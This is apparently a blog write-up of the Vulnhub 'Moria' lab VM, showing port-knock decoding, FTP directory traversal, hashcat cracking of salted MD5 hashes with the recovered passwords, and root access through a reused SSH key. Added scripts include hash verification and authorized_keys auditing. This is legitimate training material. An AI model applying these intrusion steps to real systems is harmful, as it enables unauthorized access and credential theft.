Vulnhub Moria Walkthrough


I spent some time with Moria (v1.1) this past week…super fun machine and a good exercise in thinking outside the box.

And without further ado…here’s Moria.

Nmap shows…

root@kali:~/vulnhub/moria# cat moria.nmap 
# Nmap 7.60 scan initiated Mon Nov  6 18:34:11 2017 as: nmap -sS -sV -oA moria 172.16.115.135
Nmap scan report for 172.16.115.135
Host is up (0.00031s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:D5:6D:D5 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov  6 18:34:25 2017 -- 1 IP address (1 host up) scanned in 14.47 seconds

Checking out port 80 we see…

Uh…sure. Admittedly, I’m not good at being a geek. I know this is LOTR related, but meh…I take note, and run gobuster.

root@kali:~/vulnhub/moria# gobuster -u http://172.16.115.135 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://172.16.115.135/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 403,500,200,204,301,302,307
[+] Expanded     : true
=====================================================
http://172.16.115.135/.hta (Status: 403)
http://172.16.115.135/.htpasswd (Status: 403)
http://172.16.115.135/.htaccess (Status: 403)
http://172.16.115.135/cgi-bin/ (Status: 403)
http://172.16.115.135/index.php (Status: 200)
http://172.16.115.135/w (Status: 301)
=====================================================

Nothing too interesting…let’s see what’s what in w.

WUT? We keep digging and, to save some reading time, we end up with http://moria/w/h/i/s/p/e/r/the_abyss — what’s interesting is that every page refresh presents something new.

We see: (with a refresh in between each one)

Balin: "Be quiet, the Balrog will hear you!"
Oin:"Stop knocking!"
Ori:"Will anyone hear us?"
Fundin:"That human will never save us!"
Nain:"Will the human get the message?"
"Eru! Save us!"
"We will die here.."
"Is this the end?"
"Knock knock"
"Too loud!"
Maeglin:"The Balrog is not around, hurry!"
Telchar to Thrain:"That human is slow, don't give up yet"
Dain:"Is that human deaf? Why is it not listening?"

Alrighty then. So…I wasn’t sure what was going on here yet. I went back to the image on the home page. Is there a secret message? I’m not sure…so I saved the image locally, and tried to extract any info out of it using stegosuite.

root@kali:~/vulnhub/moria# stegosuite -x moria.jpg 
Loading jpg image from /root/vulnhub/moria/moria.jpg
Extracting data...
Nf weder 1 noch 3

Interesting. Throwing that into Google, we get the idea that “weder noch” means “neither nor” – so neither 1 nor 3. Honestly, I have no idea if this was any kind of hint or what, but for what it’s worth, I included it here…at least to introduce you to stegosuite perhaps if you haven’t encountered it before.

Ok…so where were we? After reviewing the phrases on “the_abyss,” we see a theme of hearing, listening, knocking. So let’s listen. Fire up wireshark, and we see this (output below is filtered, but the content is what we’re interested in).

This pattern repeats, over and over. Destination ports 77, 101, 108, 108, 111, 110, 54, 57. I tried several times to see if port knocking would have any effect using the specified order, but no such luck. Nmap scans returned no new ports, and nothing seemed to be changing. As Telchar said to Thrain, “That human is slow, don’t give up yet.”

Being a slow human, I wasted some time trying to figure out what this meant. Ultimately, I landed here: https://www.branah.com/ascii-converter, and finally figured out that 77, 101, 108, 108, 111, 110, 54, 57 converted to ascii gives us “Mellon69” … ok then. Looks like a password to me. Where can we use it? How about that ftp server?
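Reconstructing that decode step in code, as an added example that is not part of the original post: the capture below is constructed in a tshark-style summary format to stand in for the Wireshark view (addresses, source ports and timings are made up; the destination ports are the eight listed above). Instead of converting the numbers by hand, the script pulls destination ports out of the capture, finds the period of the repeating pattern, and only accepts the result when every value is printable ASCII, which is what separates an encoded string from a genuine knock sequence or scan noise.

```python
"""Recover a string encoded as a repeating sequence of TCP destination ports.

Added example for this walkthrough, not code from the post. SAMPLE_CAPTURE is a
constructed tshark-style summary standing in for the Wireshark view: the
addresses, source ports and timings are made up; the destination ports are the
eight listed in the post.
"""
import re
from typing import List, Optional

SAMPLE_CAPTURE = """\
 1 0.000 10.0.0.2 -> 10.0.0.1 TCP 60 40001 > 77 [SYN] Seq=0
 2 0.100 10.0.0.2 -> 10.0.0.1 TCP 60 40002 > 101 [SYN] Seq=0
 3 0.200 10.0.0.2 -> 10.0.0.1 TCP 60 40003 > 108 [SYN] Seq=0
 4 0.300 10.0.0.2 -> 10.0.0.1 TCP 60 40004 > 108 [SYN] Seq=0
 5 0.400 10.0.0.2 -> 10.0.0.1 TCP 60 40005 > 111 [SYN] Seq=0
 6 0.500 10.0.0.2 -> 10.0.0.1 TCP 60 40006 > 110 [SYN] Seq=0
 7 0.600 10.0.0.2 -> 10.0.0.1 TCP 60 40007 > 54 [SYN] Seq=0
 8 0.700 10.0.0.2 -> 10.0.0.1 TCP 60 40008 > 57 [SYN] Seq=0
 9 0.800 10.0.0.2 -> 10.0.0.1 TCP 60 40009 > 77 [SYN] Seq=0
10 0.900 10.0.0.2 -> 10.0.0.1 TCP 60 40010 > 101 [SYN] Seq=0
11 1.000 10.0.0.2 -> 10.0.0.1 TCP 60 40011 > 108 [SYN] Seq=0
12 1.100 10.0.0.2 -> 10.0.0.1 TCP 60 40012 > 108 [SYN] Seq=0
13 1.200 10.0.0.2 -> 10.0.0.1 TCP 60 40013 > 111 [SYN] Seq=0
14 1.300 10.0.0.2 -> 10.0.0.1 TCP 60 40014 > 110 [SYN] Seq=0
15 1.400 10.0.0.2 -> 10.0.0.1 TCP 60 40015 > 54 [SYN] Seq=0
16 1.500 10.0.0.2 -> 10.0.0.1 TCP 60 40016 > 57 [SYN] Seq=0
17 1.600 10.0.0.2 -> 10.0.0.1 TCP 60 40017 > 77 [SYN] Seq=0
18 1.700 10.0.0.2 -> 10.0.0.1 TCP 60 40018 > 101 [SYN] Seq=0
"""

# tshark prints "TCP <len> <srcport> > <dstport>" for TCP packets.
PORT_RE = re.compile(r"\bTCP\s+\d+\s+(\d+)\s+>\s+(\d+)\b")


def destination_ports(capture: str) -> List[int]:
    """Destination port of every TCP packet line, in capture order."""
    ports = []
    for line in capture.splitlines():
        match = PORT_RE.search(line)
        if match:
            ports.append(int(match.group(2)))
    return ports


def cycle_length(seq: List[int]) -> Optional[int]:
    """Smallest period p with seq[i] == seq[i+p] for every i, or None if the
    sequence does not repeat within the observed window."""
    n = len(seq)
    for p in range(1, n // 2 + 1):
        if all(seq[i] == seq[i + p] for i in range(n - p)):
            return p
    return None


def decode_ports(ports: List[int]) -> Optional[str]:
    """One cycle of the port pattern read as ASCII, or None when the pattern
    does not repeat or contains non-printable values (a real knock sequence
    or unrelated scanning would usually fail this check)."""
    p = cycle_length(ports)
    if p is None:
        return None
    unit = ports[:p]
    if any(not 32 <= v <= 126 for v in unit):
        return None
    return "".join(chr(v) for v in unit)


if __name__ == "__main__":
    ports = destination_ports(SAMPLE_CAPTURE)
    print("period:", cycle_length(ports), "decoded:", decode_ports(ports))
```

From the monitoring side the same property is the detection: a client sending SYNs to a fixed cycle of low, unserved ports is a simple alert to write, whether the cycle is a knock sequence or a message.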

After trying a few defaults (admin, root, moria, etc.) I noticed the FTP welcome message: “Welcome Balrog” – so I try that…and success!

root@kali:~/vulnhub/moria# ftp 172.16.115.135
Connected to 172.16.115.135.
220 Welcome Balrog!
Name (172.16.115.135:root): Balrog
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

A little exploration leads to…directory traversal. Excellent…let’s see what we can find.

ftp> pwd
257 "/prison"
ftp> cd /
250 Directory successfully changed.
ftp> pwd
257 "/"
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0               7 Mar 11  2017 bin -> usr/bin
dr-xr-xr-x    4 0        0            4096 Mar 11  2017 boot
drwxr-xr-x   21 0        0            3240 Nov 08 06:07 dev
drwxr-xr-x   97 0        0            8192 Nov 10 00:35 etc
[...SNIP...]
ftp> cd /var/www/html
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
226 Directory send OK.

We’ve found that we can break out of /prison, and explore the file system. In /var/www/html, we find an interesting directory…what can that be?

Looks like some md5 hashes. I took the hashes, threw them into hashcat against rockyou, and nothing…generated some LOTR wordlists…nothing. Hmph. Perhaps I should’ve dug deeper. (use the source, Luke). Viewing the source of the page shows us that this is an md5(md5(password).salt) hash. Oh…and it conveniently gives us the salt value as well. Good deal.

A little Googling shows that the proper hashcat mode is 2611.
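To see why mode 2611 is the right one, here is the scheme reproduced in Python as an added example (not code from the post or from the VM): `vbulletin_hash` computes md5(md5(password).salt) with both digests as lowercase hex, which is what hashcat's mode 2611 (vBulletin < v3.8.5) does, and `check_candidates` confirms a single cracked result offline against one hash:salt pair from the page. The small wordlist and the PBKDF2 functions are constructed here for contrast: with the same salt design but a slow, salted KDF, a dictionary run would not finish in under a second.

```python
"""Reproduce md5(md5(password).salt) to confirm a cracked candidate, beside a
slow-KDF record format for comparison.

Added example for this walkthrough; not code from the post or the VM. The
hash:salt pairs used with it are the ones listed in the post; the wordlist and
the PBKDF2 parameters are constructed here.
"""
import hashlib
import hmac
import os
from typing import Iterable, Optional


def vbulletin_hash(password: str, salt: str) -> str:
    """md5(md5(password) . salt): inner digest as lowercase hex, salt appended,
    outer digest as lowercase hex. This is what hashcat mode 2611 computes."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()


def check_candidates(target: str, salt: str, words: Iterable[str]) -> Optional[str]:
    """Return the first word whose hash equals `target`, or None.
    compare_digest keeps the comparison constant-time if this ever runs server-side."""
    target = target.lower()
    for word in words:
        if hmac.compare_digest(vbulletin_hash(word, salt), target):
            return word
    return None


def pbkdf2_record(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Hardened alternative: PBKDF2-HMAC-SHA256 with a random 16-byte salt and a
    work factor, stored as algorithm$iterations$salt_hex$hash_hex."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, record: str) -> bool:
    """Recompute the PBKDF2 record from its stored parameters and compare."""
    _algo, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # One hash:salt line from the post against a tiny constructed wordlist.
    print(check_candidates("dd272382909a4f51163c77da6356cc6f", "tb9AWe", ["flower", "spanky", "magic"]))
    record = pbkdf2_record("magic")
    print(record, pbkdf2_verify("magic", record))
```

Whenever hashcat reports a mode for an unfamiliar format, re-deriving one hash this way is a cheap check that the mode really matches the application's code rather than merely sharing a digest length with it.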

root@wopr/Users/gmurphy/hashcat$ cat moria.hashes
c2d8960157fc8540f6d5d66594e165e0:6MAp84
727a279d913fba677c490102b135e51e:bQkChe
8c3c3152a5c64ffb683d78efc3520114:HnqeN4
6ba94d6322f53f30aca4f34960203703:e5ad5s
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP
6a113db1fd25c5501ec3a5936d817c29:cC5nTr
7db5040c351237e8332bfbba757a1019:h8spZR
dd272382909a4f51163c77da6356cc6f:tb9AWe

root@wopr/Users/gmurphy/hashcat$ ./hashcat -m 2611 -a 0 moria.hashes rockyou.txt
hashcat (v3.5.0-149-g23b5e7f) starting...
[...SNIP...]

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14343298
* Bytes.....: 139921513
* Keyspace..: 14343298

dd272382909a4f51163c77da6356cc6f:tb9AWe:magic
727a279d913fba677c490102b135e51e:bQkChe:rainbow
6ba94d6322f53f30aca4f34960203703:e5ad5s:fuckoff
8c3c3152a5c64ffb683d78efc3520114:HnqeN4:spanky
6a113db1fd25c5501ec3a5936d817c29:cC5nTr:abcdef
c2d8960157fc8540f6d5d66594e165e0:6MAp84:flower
7db5040c351237e8332bfbba757a1019:h8spZR:darkness
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP:warrior
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7:hunter2

Session..........: hashcat
Status...........: Cracked
Hash.Type........: vBulletin < v3.8.5
Hash.Target......: moria.hashes
Time.Started.....: Wed Nov  8 00:56:47 2017 (0 secs)
Time.Estimated...: Wed Nov  8 00:56:47 2017 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 48572.0 kH/s (7.24ms)
Recovered........: 9/9 (100.00%) Digests, 9/9 (100.00%) Salts
Progress.........: 5898375/129089682 (4.57%)
Rejected.........: 135/5898375 (0.00%)
Restore.Point....: 0/14343298 (0.00%)
Candidates.#2....: 123456 -> grape06

Started: Wed Nov  8 00:56:38 2017

Great…now we have what seems to be some usernames and passwords. Enumerating through the list lands us an SSH login using Ori. Let’s dig in…

root@kali:~/vulnhub/moria# ssh Ori@172.16.115.135
Ori@172.16.115.135's password: 
Last login: Thu Nov 9 17:56:44 2017 from 172.16.115.137
-bash-4.2$ ls -lah
total 16K
drwx------  3 Ori  notBalrog   55 Nov  9 19:59 .
drwxr-x---. 4 root notBalrog   32 Mar 14  2017 ..
-rw-------  1 Ori  notBalrog 9.2K Nov  9 17:57 .bash_history
drwx------  2 Ori  notBalrog   57 Mar 12  2017 .ssh
-rw-r--r--  1 root root       225 Mar 13  2017 poem.txt
-bash-4.2$ cat poem.txt 
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by. 

PS: Moria will not fall!

Poem.txt doesn’t really show anything interesting, but at least I have a good drinking song for my upcoming guys weekend! But I digress…back to the good stuff.

Let’s check out .ssh and see what we find.

-bash-4.2$ ls -lah 
total 12K
drwx------ 2 Ori notBalrog   57 Mar 12  2017 .
drwx------ 3 Ori notBalrog   55 Nov  9 19:59 ..
-rw------- 1 Ori notBalrog 1.7K Mar 12  2017 id_rsa
-rw-r--r-- 1 Ori notBalrog  392 Mar 12  2017 id_rsa.pub
-rw-r--r-- 1 Ori notBalrog  342 Nov  9 18:12 known_hosts
-bash-4.2$ cat known_hosts 
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
-bash-4.2$

So Ori has ssh’d into 127.0.0.1 before. Interesting indeed. Two things to take note of here, if you’re not familiar with public key authentication:

  • “known_hosts” stores the host public keys of servers you have previously SSH’d into
  • “authorized_keys” specifies the SSH keys that can be used for logging into a user account when public key auth is configured
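Both files store keys in the same OpenSSH wire format, so one parser covers them. The following is an added example, not code from the post: it decodes the known_hosts line shown above into its fields, prints the SHA256 fingerprint in the style of `ssh-keygen -lf`, and then audits a constructed root authorized_keys file against a map of users' public keys, which is the defender's version of the check the walkthrough is about to make by hand. The `fake_rsa_line` helper builds throwaway ssh-rsa blobs purely so the audit has input; they are not usable keys, and option prefixes in authorized_keys lines are not handled.

```python
"""Parse OpenSSH public-key lines, fingerprint them, and audit an
authorized_keys file for keys that belong to other accounts.

Added example for this walkthrough, not code from the post. KNOWN_HOSTS_LINE is
the line shown in the post; every other key line is constructed from throwaway
material and is not a usable key.
"""
import base64
import hashlib
import struct
from typing import Dict, List, Tuple

# Host key recorded in Ori's known_hosts (copied from the post).
KNOWN_HOSTS_LINE = "127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0="


def ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(data)) + data


def parse_blob(blob: bytes) -> List[bytes]:
    """Split a base64-decoded key blob into its length-prefixed fields."""
    fields, i = [], 0
    while i < len(blob):
        (n,) = struct.unpack(">I", blob[i:i + 4])
        i += 4
        fields.append(blob[i:i + n])
        i += n
    return fields


def parse_pubkey_line(line: str) -> Tuple[str, bytes, str]:
    """Return (key type, raw blob, comment) for a known_hosts or authorized_keys line.
    known_hosts lines start with a host field, which is skipped. Option prefixes
    in authorized_keys (e.g. command="...") are not handled here."""
    parts = line.split()
    if not parts[0].startswith(("ssh-", "ecdsa-")):
        parts = parts[1:]
    key_type, blob = parts[0], base64.b64decode(parts[1])
    comment = " ".join(parts[2:])
    inner_type = parse_blob(blob)[0].decode()
    if inner_type != key_type:
        raise ValueError(f"type field {key_type!r} does not match blob {inner_type!r}")
    return key_type, blob, comment


def fingerprint(blob: bytes) -> str:
    """SHA256 fingerprint as printed by `ssh-keygen -lf` (base64 without '=' padding)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def fake_rsa_line(seed: int, comment: str) -> str:
    """Constructed ssh-rsa line whose 'modulus' is just a hash of the seed.
    Structurally valid so the parser and audit have input; cryptographically useless."""
    e = (65537).to_bytes(3, "big")
    n = b"\x00" + hashlib.sha256(seed.to_bytes(4, "big")).digest()
    blob = ssh_string(b"ssh-rsa") + ssh_string(e) + ssh_string(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def audit_authorized_keys(authorized: str, user_keys: Dict[str, str]) -> List[Tuple[str, str]]:
    """For each key in `authorized`, report (fingerprint, owning account or 'unknown').
    An entry in root's file that resolves to a non-root account is the finding."""
    owner_by_fp = {fingerprint(parse_pubkey_line(l)[1]): user for user, l in user_keys.items()}
    report = []
    for line in authorized.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fp = fingerprint(parse_pubkey_line(line)[1])
        report.append((fp, owner_by_fp.get(fp, "unknown")))
    return report


if __name__ == "__main__":
    ktype, blob, _ = parse_pubkey_line(KNOWN_HOSTS_LINE)
    print(ktype, parse_blob(blob)[1].decode(), fingerprint(blob))
    users = {"root": fake_rsa_line(1, "root@Moria"), "Ori": fake_rsa_line(2, "Ori@Moria")}
    root_authorized = users["root"] + "\n" + users["Ori"] + "\n"
    for fp, owner in audit_authorized_keys(root_authorized, users):
        print(fp, "->", owner)
```

On the host, `ssh-keygen -lf /etc/ssh/ssh_host_ecdsa_key.pub` should print the same fingerprint that this computes from the known_hosts entry, which confirms the recorded host key is the server's own; and any fingerprint in root's authorized_keys that resolves to another account's key is exactly the condition the next step tests for.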

With that…let’s see if we’re lucky enough that Ori’s key was in root’s “authorized_keys”.

-bash-4.2$ ssh root@127.0.0.1 -i id_rsa
Last login: Thu Nov  9 22:42:22 2017 from 127.0.0.1
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]# cat /root/flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
-Abatchy

[root@Moria ~]#


Excellent! Root it is. Nicely done challenge, Abatchy.

Thanks for reading…hopefully you have learned something.